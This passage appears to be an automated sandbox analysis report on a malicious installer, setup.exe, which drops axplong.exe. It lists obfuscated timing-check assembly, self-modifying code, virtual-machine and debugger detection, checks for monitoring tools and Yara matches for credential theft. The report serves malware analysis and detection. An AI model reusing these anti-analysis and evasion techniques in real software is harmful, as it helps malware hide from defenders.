Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EF00A8 second address: 4EF00DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F47D8E48277h 0x00000008 push ecx 0x00000009 pop edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d and esp, FFFFFFF8h 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F47D8E4826Ch 0x00000019 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EF00DA second address: 4EF00DE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EF00DE second address: 4EF00E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EF00E4 second address: 4EF0168 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a jmp 00007F47D8E3B0B0h 0x0000000f push eax 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F47D8E3B0B1h 0x00000017 adc si, 1266h 0x0000001c jmp 00007F47D8E3B0B1h 0x00000021 popfd 0x00000022 pushfd 0x00000023 jmp 00007F47D8E3B0B0h 0x00000028 or al, 00000008h 0x0000002b jmp 00007F47D8E3B0ABh 0x00000030 popfd 0x00000031 popad 0x00000032 xchg eax, ecx 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F47D8E3B0B0h 0x0000003c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EF0168 second address: 4EF016C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EF016C second address: 4EF0172 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EF0172 second address: 4EF0178 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EF0178 second address: 4EF017C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EF017C second address: 4EF01D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F47D8E48272h 0x00000010 or ax, F6C8h 0x00000015 jmp 00007F47D8E4826Bh 0x0000001a popfd 0x0000001b mov bl, cl 0x0000001d popad 0x0000001e push eax 0x0000001f pushad 0x00000020 mov dx, cx 0x00000023 jmp 00007F47D8E4826Ch 0x00000028 popad 0x00000029 xchg eax, ebx 0x0000002a pushad 0x0000002b mov dx, ax 0x0000002e mov di, si 0x00000031 popad 0x00000032 mov ebx, dword ptr [ebp+10h] 0x00000035 push eax 0x00000036 push edx 0x00000037 jmp 00007F47D8E4826Bh 0x0000003c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EF01D8 second address: 4EF020B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F47D8E3B0AFh 0x00000008 pop ecx 0x00000009 mov cx, dx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push esi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F47D8E3B0B7h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EF020B second address: 4EF0223 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E48274h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EF0223 second address: 4EF0233 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e mov bh, 2Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EF0233 second address: 4EF026D instructions: 0x00000000 rdtsc 0x00000002 mov ecx, 7FE5F4DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov si, 03B7h 0x0000000d popad 0x0000000e mov esi, dword ptr [ebp+08h] 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 pushfd 0x00000015 jmp 00007F47D8E48276h 0x0000001a adc ch, FFFFFFD8h 0x0000001d jmp 00007F47D8E4826Bh 0x00000022 popfd 0x00000023 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EF026D second address: 4EF02E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push esp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F47D8E3B0B9h 0x00000014 or eax, 31A7DED6h 0x0000001a jmp 00007F47D8E3B0B1h 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007F47D8E3B0B0h 0x00000026 sbb esi, 32CCB4F8h 0x0000002c jmp 00007F47D8E3B0ABh 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EF02E4 second address: 4EF02EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EF02EA second address: 4EF034E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], edi 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F47D8E3B0ABh 0x00000017 or ch, 0000006Eh 0x0000001a jmp 00007F47D8E3B0B9h 0x0000001f popfd 0x00000020 pushfd 0x00000021 jmp 00007F47D8E3B0B0h 0x00000026 or eax, 7AC560E8h 0x0000002c jmp 00007F47D8E3B0ABh 0x00000031 popfd 0x00000032 popad 0x00000033 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EF034E second address: 4EF038C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 598Ah 0x00000007 pushfd 0x00000008 jmp 00007F47D8E4826Bh 0x0000000d add eax, 3A82C82Eh 0x00000013 jmp 00007F47D8E48279h 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c test esi, esi 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EF038C second address: 4EF0392 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EF0392 second address: 4EF045F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 64F2h 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a je 00007F484B3064DFh 0x00000010 pushad 0x00000011 push ebx 0x00000012 pushfd 0x00000013 jmp 00007F47D8E48272h 0x00000018 add eax, 2261A808h 0x0000001e jmp 00007F47D8E4826Bh 0x00000023 popfd 0x00000024 pop esi 0x00000025 movsx edi, ax 0x00000028 popad 0x00000029 cmp dword ptr [esi+08h], DDEEDDEEh 0x00000030 pushad 0x00000031 mov di, si 0x00000034 mov ax, BF49h 0x00000038 popad 0x00000039 je 00007F484B3064B3h 0x0000003f jmp 00007F47D8E48274h 0x00000044 mov edx, dword ptr [esi+44h] 0x00000047 jmp 00007F47D8E48270h 0x0000004c or edx, dword ptr [ebp+0Ch] 0x0000004f pushad 0x00000050 pushfd 0x00000051 jmp 00007F47D8E4826Eh 0x00000056 and ah, FFFFFFF8h 0x00000059 jmp 00007F47D8E4826Bh 0x0000005e popfd 0x0000005f movzx esi, bx 0x00000062 popad 0x00000063 test edx, 61000000h 0x00000069 jmp 00007F47D8E4826Bh 0x0000006e jne 00007F484B3064ACh 0x00000074 push eax 0x00000075 push edx 0x00000076 jmp 00007F47D8E48275h 0x0000007b rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EF045F second address: 4EF0502 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F47D8E3B0B7h 0x00000009 adc ah, FFFFFFCEh 0x0000000c jmp 00007F47D8E3B0B9h 0x00000011 popfd 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 test byte ptr [esi+48h], 00000001h 0x00000019 pushad 0x0000001a pushfd 0x0000001b jmp 00007F47D8E3B0B3h 0x00000020 sbb cx, 03DEh 0x00000025 jmp 00007F47D8E3B0B9h 0x0000002a popfd 0x0000002b jmp 00007F47D8E3B0B0h 0x00000030 popad 0x00000031 jne 00007F484B2F9264h 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F47D8E3B0B7h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EF0502 second address: 4EF0553 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E48279h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test bl, 00000007h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F47D8E48276h 0x00000015 jmp 00007F47D8E48275h 0x0000001a popfd 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE0812 second address: 4EE08B5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushfd 0x00000006 jmp 00007F47D8E3B0B3h 0x0000000b xor cx, 66BEh 0x00000010 jmp 00007F47D8E3B0B9h 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebx 0x0000001a jmp 00007F47D8E3B0AEh 0x0000001f push eax 0x00000020 pushad 0x00000021 pushfd 0x00000022 jmp 00007F47D8E3B0B1h 0x00000027 xor cx, 23A6h 0x0000002c jmp 00007F47D8E3B0B1h 0x00000031 popfd 0x00000032 mov edx, esi 0x00000034 popad 0x00000035 xchg eax, ebx 0x00000036 jmp 00007F47D8E3B0AAh 0x0000003b xchg eax, esi 0x0000003c pushad 0x0000003d call 00007F47D8E3B0AEh 0x00000042 mov ax, CF51h 0x00000046 pop eax 0x00000047 movsx ebx, ax 0x0000004a popad 0x0000004b push eax 0x0000004c push eax 0x0000004d push edx 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE08B5 second address: 4EE08B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE08B9 second address: 4EE08BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE08BF second address: 4EE08C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE08C5 second address: 4EE08C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE08C9 second address: 4EE08F6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E4826Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, esi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F47D8E48275h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE08F6 second address: 4EE0906 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E3B0ACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE0906 second address: 4EE0954 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov esi, dword ptr [ebp+08h] 0x0000000b pushad 0x0000000c mov bl, 4Ch 0x0000000e push ecx 0x0000000f pushfd 0x00000010 jmp 00007F47D8E48275h 0x00000015 or cx, 7286h 0x0000001a jmp 00007F47D8E48271h 0x0000001f popfd 0x00000020 pop ecx 0x00000021 popad 0x00000022 mov ebx, 00000000h 0x00000027 push eax 0x00000028 push edx 0x00000029 pushad 0x0000002a pushad 0x0000002b popad 0x0000002c mov edx, 1973281Ah 0x00000031 popad 0x00000032 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE0954 second address: 4EE0982 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, si 0x00000006 jmp 00007F47D8E3B0AAh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e test esi, esi 0x00000010 pushad 0x00000011 mov dx, ax 0x00000014 mov cx, 49E9h 0x00000018 popad 0x00000019 je 00007F484B300AC2h 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov dx, EC34h 0x00000026 pushad 0x00000027 popad 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE0982 second address: 4EE0995 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47D8E4826Fh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE0995 second address: 4EE0999 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE0999 second address: 4EE09DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000000f jmp 00007F47D8E48275h 0x00000014 mov ecx, esi 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F47D8E48278h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE09DB second address: 4EE09EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE09EA second address: 4EE09F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE09F0 second address: 4EE0A6B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007F484B300A48h 0x00000011 pushad 0x00000012 mov cl, 00h 0x00000014 mov bx, 5B84h 0x00000018 popad 0x00000019 test byte ptr [77436968h], 00000002h 0x00000020 jmp 00007F47D8E3B0B3h 0x00000025 jne 00007F484B300A33h 0x0000002b pushad 0x0000002c pushfd 0x0000002d jmp 00007F47D8E3B0B4h 0x00000032 sub al, 00000068h 0x00000035 jmp 00007F47D8E3B0ABh 0x0000003a popfd 0x0000003b pushad 0x0000003c push eax 0x0000003d pop edi 0x0000003e mov eax, 13FCA6F1h 0x00000043 popad 0x00000044 popad 0x00000045 mov edx, dword ptr [ebp+0Ch] 0x00000048 push eax 0x00000049 push edx 0x0000004a pushad 0x0000004b mov di, BFDCh 0x0000004f push edx 0x00000050 pop eax 0x00000051 popad 0x00000052 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE0A6B second address: 4EE0B25 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E4826Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F47D8E4826Eh 0x00000011 adc ax, 0028h 0x00000016 jmp 00007F47D8E4826Bh 0x0000001b popfd 0x0000001c pushfd 0x0000001d jmp 00007F47D8E48278h 0x00000022 sbb al, FFFFFF88h 0x00000025 jmp 00007F47D8E4826Bh 0x0000002a popfd 0x0000002b popad 0x0000002c push eax 0x0000002d pushad 0x0000002e mov ecx, edi 0x00000030 mov si, di 0x00000033 popad 0x00000034 xchg eax, ebx 0x00000035 pushad 0x00000036 mov edx, 22F91ECEh 0x0000003b pushfd 0x0000003c jmp 00007F47D8E4826Fh 0x00000041 sub esi, 2F50D77Eh 0x00000047 jmp 00007F47D8E48279h 0x0000004c popfd 0x0000004d popad 0x0000004e xchg eax, ebx 0x0000004f push eax 0x00000050 push edx 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007F47D8E48278h 0x00000058 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE0B25 second address: 4EE0B34 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47D8E3B0ABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE0B34 second address: 4EE0B87 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F47D8E4826Fh 0x00000009 sub eax, 55E4A6EEh 0x0000000f jmp 00007F47D8E48279h 0x00000014 popfd 0x00000015 mov eax, 65277277h 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e jmp 00007F47D8E4826Dh 0x00000023 xchg eax, ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov al, bh 0x00000029 mov di, si 0x0000002c popad 0x0000002d rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE0B87 second address: 4EE0B9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dl, 21h 0x00000005 mov ebx, esi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push dword ptr [ebp+14h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE0B9A second address: 4EE0B9E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE0B9E second address: 4EE0BA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4EE0BA4 second address: 4EE0BAA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe Special instruction interceptor: First address: 1FEAA8 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\setup.exe Special instruction interceptor: First address: 1FE9EC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\setup.exe Special instruction interceptor: First address: 43ADE1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 56EAA8 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 56E9EC instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Special instruction interceptor: First address: 7AADE1 instructions caused by: Self-modifying code
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_04F600B8 rdtsc 0_2_04F600B8
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 867
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1178
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 436
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 837
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 1182
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Window / User API: threadDelayed 483
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 4568 Thread sleep time: -58029s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3412 Thread sleep count: 867 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3412 Thread sleep time: -1734867s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3728 Thread sleep count: 1178 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 3728 Thread sleep time: -2357178s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 716 Thread sleep count: 436 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 716 Thread sleep time: -13080000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2016 Thread sleep time: -180000s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5232 Thread sleep count: 837 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 5232 Thread sleep time: -1674837s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1280 Thread sleep count: 1182 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 1280 Thread sleep time: -2365182s >= -30000s
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2936 Thread sleep count: 483 > 30
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe TID: 2936 Thread sleep time: -966483s >= -30000s
Source: C:\Users\user\Desktop\setup.exe File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 30000
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread delayed: delay time: 180000
Source: axplong.exe, axplong.exe, 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWM)
Source: axplong.exe, 00000004.00000002.3321500762.00000000010C8000.00000004.00000020.00020000.00000000.sdmp, axplong.exe, 00000004.00000002.3321500762.00000000010FD000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: setup.exe, 00000000.00000002.2129130568.0000000000389000.00000040.00000001.01000000.00000003.sdmp, axplong.exe, 00000002.00000002.2157885886.00000000006F9000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000003.00000002.2166485787.00000000006F9000.00000040.00000001.01000000.00000007.sdmp, axplong.exe, 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\setup.exe System information queried: ModuleInformation
Source: C:\Users\user\Desktop\setup.exe Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\setup.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Thread information set: HideFromDebugger
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 4_2_04F00130 Start: 04F001A2 End: 04F00185 4_2_04F00130
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe File opened: SIWVID
Source: C:\Users\user\Desktop\setup.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Process queried: DebugPort
Source: C:\Users\user\Desktop\setup.exe Code function: 0_2_04F600B8 rdtsc 0_2_04F600B8
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 4_2_0053645B mov eax, dword ptr fs:[00000030h] 4_2_0053645B
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 4_2_0053A1C2 mov eax, dword ptr fs:[00000030h] 4_2_0053A1C2
Source: C:\Users\user\Desktop\setup.exe Process created: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe "C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Source: axplong.exe, axplong.exe, 00000004.00000002.3319717085.00000000006F9000.00000040.00000001.01000000.00000007.sdmp Binary or memory string: PProgram Manager
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 4_2_0051D312 cpuid 4_2_0051D312
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Queries volume information: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe Code function: 4_2_0051CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime, 4_2_0051CB1A

Stealing of Sensitive Information

Source: Yara match File source: 3.2.axplong.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.axplong.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.setup.exe.190000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.axplong.exe.500000.0.unpack, type: UNPACKEDPE
